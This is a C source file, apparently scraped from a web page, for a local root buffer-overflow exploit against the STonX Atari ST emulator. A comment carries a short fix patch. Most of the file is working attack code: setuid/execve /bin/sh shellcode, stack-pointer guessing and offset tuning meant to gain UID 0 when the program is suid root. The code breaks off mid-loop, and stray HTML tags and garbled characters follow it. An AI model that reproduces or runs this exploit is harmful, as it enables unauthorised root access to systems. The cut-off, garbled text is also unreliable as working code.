/* (STonX [0.6.7]?[0.6.5]) local root buffer overflow exploit. - {x86}. * * Author: Cody Tubbs (loophole of hhp). * www.hhp-programming.net / pigspigs@yahoo.com * 12/27/2000 * * STonX is the Atari ST Emulator for Unix/X. * Current release is 0.6.5. * Current pre-release is 0.6.7-epsilon. * * Tested on 0.6.7-epsilon via Slackware Linux 7.0. * Same bug is within 0.6.5, it will work as well most likely. * * Will gain UID=0 when STonX is suid root. * * TEMPFIX PATCH INCLUDED (hhp-stonx_main.patch): ********************************************************************* --- old/main.c Sun Dec 31 18:40:14 2000 +++ new/main.c Sun Dec 31 18:41:28 2000 @@ -290,9 +290,9 @@ { char *home; if ((home=getenv("HOME")) != NULL) { FILE *rc; - char stonxrc[256]; - strcpy (stonxrc,home); - strcat (stonxrc,"/"STONXRC); + char stonxrc[512+1]; + strncpy(stonxrc,home,502); + strncat(stonxrc,"/"STONXRC,10);//STONXRC=".stonxrc" if ((rc=fopen(stonxrc,"r")) != NULL) { int i,c=1; char *args[64]; ********************************************************************** * end of tempfix patch. Install via: 'patch -p1 < hhp-stonx_main.patch' */ #include #define PATH "/usr/X11R6/bin/stonx" // Change if needed. #define OFFSET -7342 // Worked for me, brute if fails. #define ALLIGN 1 // Should not need to be change. #define NOP 0x90 #define DBUF 800 static char shellcode[]= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x66\x31" "\xc0\x66\x31\xdb\xb0\x2e\xcd\x80\xeb\x1f" "\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh\x69"; long get_sp(void){__asm__("movl %esp,%eax");} void workit(char *heh){ fprintf(stderr, "(STonX [0.6.7]?[0.6.5]) Local root exploit - {x86}.\n"); fprintf(stderr, "Author: Cody Tubbs (loophole of hhp).\n"); fprintf(stderr, "Usage: %s [offset] [allign(0..3)]\n", heh); } main(int argc, char **argv){ char eipeip[DBUF], buffer[4096], heh[DBUF+1]; int i, offset, gid, allign; long address; workit(argv[0]); if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;} if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;} address=get_sp()-offset; if(allign>0){for(i=0;i
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß